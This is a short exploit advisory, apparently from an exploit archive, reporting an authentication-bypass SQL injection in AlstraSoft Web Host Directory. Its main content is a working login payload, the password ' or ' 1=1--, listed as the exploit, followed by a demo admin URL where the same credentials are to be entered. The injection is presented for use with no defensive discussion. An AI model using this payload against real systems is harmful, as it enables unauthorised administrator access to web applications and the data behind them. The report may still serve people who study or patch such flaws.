id: 4165
date: 11/12/2008
title: AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
author: ZoRLu
cves: 

==============================================================
AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
==============================================================


[~] AlstraSoft Web Host Directory auth bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 12.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 36
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------


Exploit:

username: ZoRLu

password: ' or ' 1=1--


admin login for demo:

http://www.hyperstop.com/demo/webhost/

username: ZoRLu

password: ' or ' 1=1--



#  0day.today [2023-03-26]  #